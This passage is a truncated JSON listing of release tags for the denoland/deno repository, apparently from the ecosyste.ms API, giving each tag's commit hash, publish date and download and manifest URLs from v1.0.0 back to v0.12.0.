1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"